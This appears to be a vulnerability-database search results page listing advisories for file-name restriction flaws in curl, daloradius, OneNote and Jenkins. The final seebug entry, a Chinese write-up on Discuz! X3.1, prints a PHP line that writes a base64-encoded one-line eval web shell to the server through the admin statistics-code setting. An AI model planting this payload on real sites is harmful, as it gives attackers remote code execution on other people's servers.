Lucene search
K

9 matches found

AstraLinux
AstraLinux
added 2026/05/20 5:53 a.m.2 views

Astra Linux – Vulnerability in curl

Curl versions 7.20.0 through 7.70.0 are vulnerable to improper restrictions on the names of files and other resources, which can lead to overwriting of local files when the -J flag is used...

7.8CVSS6.8AI score0.01236EPSS
Exploits1References1
EUVD
EUVD
added 2025/10/03 8:7 p.m.5 views

EUVD-2022-4893

Malicious code in bioql PyPI...

7.5CVSS7.4AI score0.02073EPSS
Exploits0References10
RedhatCVE
RedhatCVE
added 2025/05/23 5:41 a.m.7 views

CVE-2023-0046

Improper Restriction of Names for Files and Other Resources in GitHub repository lirantal/daloradius prior to master-branch...

7.2CVSS7.1AI score0.01017EPSS
Exploits2References1
Positive Technologies
Positive Technologies
added 2025/01/14 12:0 a.m.5 views

PT-2025-1292

Name of the Vulnerable Software and Affected Versions Microsoft Office OneNote affected versions not specified Description The issue is related to incorrect restriction of file names and other resources in Microsoft Office OneNote. This can allow an attacker to execute arbitrary code...

7.8CVSS7.5AI score0.0065EPSS
Exploits0References7
CVE
CVE
added 2023/01/04 12:0 a.m.71 views

CVE-2023-0046

CVE-2023-0046 relates to the daloradius project: prior to the master-branch, there is an issue with improper restriction of names for files and other resources due to lack of filename restrictions when saving logging data. An attacker can manipulate the logging filename to point to an existing PH...

7.2CVSS7AI score0.01017EPSS
Exploits2References2Affected Software1
Tenable Nessus
Tenable Nessus
added 2022/01/21 12:0 a.m.142 views

Jenkins LTS < 2.319.2 / Jenkins weekly < 2.330 Multiple Vulnerabilities

According to its its self-reported version number, the version of Jenkins running on the remote web server is Jenkins LTS prior to 2.319.2 or Jenkins weekly prior to 2.330. It is, therefore, affected by multiple vulnerabilities: - A cross-site request forgery CSRF vulnerability in Jenkins 2.329 a...

9CVSS6.3AI score0.81842EPSS
Exploits0References25
Microsoft CVE
Microsoft CVE
added 2020/12/15 12:0 a.m.4 views

curl 7.20.0 through 7.70.0 is vulnerable to improper restriction of names for files and other resources that can lead too overwriting a local file when the -J flag is used.

...

7.8CVSS8.8AI score0.01236EPSS
Exploits1
CVE
CVE
added 2020/12/14 7:42 p.m.487 views

CVE-2020-8177

CVE-2020-8177 affects curl up to 7.70.0, where -J/--remote-header-name combined with -i/--include could allow a malicious server to overwrite a local file due to improper restriction of file names. Connected advisories confirm this vulnerability across distributions (Debian, CentOS, Alpine, Amazo...

7.8CVSS7.2AI score0.01236EPSS
Exploits1References5Affected Software1
seebug.org
seebug.org
added 2014/03/09 12:0 a.m.24 views

Discuz! X3.1 Release 20140301后台拿shell真的修复了吗

简要描述: 之前写的几个后台拿shell,Discuz!忽略了,但新版本Discuz! X3.1 Release 20140301实际上有所加强,但是真的修复了之前提到的问题吗? Discuz!大概做了下面几个改动: 1.统计代码处,对 "和 "" 的被转意了,那就用 ,经过测试,尖括号未被转意。 下面来重现过程: 1.先上传一张版本图: 2. 全局-站点信息-网站第三方统计代码, 里面插入我们要执行的php代码,如下: fputsfopen't.php',w,base64decode"PD9waHAgQGV2YWwoJF9QT1NUW2NdKTs/Pg=="; 3.工具 - 更新缓存,...

7AI score
Exploits0
Rows per page
Query Builder